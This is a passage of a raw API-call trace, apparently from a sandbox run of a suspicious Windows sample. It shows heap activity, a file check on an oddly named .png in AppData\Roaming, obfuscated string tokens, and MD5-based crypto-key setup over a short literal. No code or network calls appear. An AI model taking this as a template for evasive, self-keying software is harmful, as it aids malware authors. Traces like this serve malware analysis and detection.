(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.273] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/nst7Asd C.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21139bb0, ftCreationTime.dwHighDateTime=0x1d5d618, ftLastAccessTime.dwLowDateTime=0xd776c210, ftLastAccessTime.dwHighDateTime=0x1d5d744, ftLastWriteTime.dwLowDateTime=0xd776c210, ftLastWriteTime.dwHighDateTime=0x1d5d744, nFileSizeHigh=0x0, nFileSizeLow=0xc550, dwReserved0=0x0, dwReserved1=0x0, cFileName="nst7Asd C.png", cAlternateFileName="NST7AS~1.PNG")) returned 0x9e2078 [0149.273] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.274] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0149.275] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.275] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0149.275] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.275] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.276] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0149.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.277] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.277] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.278] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0149.278] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0149.278] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.278] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.278] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0149.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0149.278] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0149.279] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0149.279] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0149.279] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.279] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.279] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0149.280] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0149.280] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.280] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.280] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.280] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.289] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.289] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.289] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.289] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.289] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.289] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0149.289] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.290] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.290] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.290] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa318, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0149.290] CryptHashData (hHash=0x9e20f8, pbData=0x2a71d48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0149.290] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.290] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 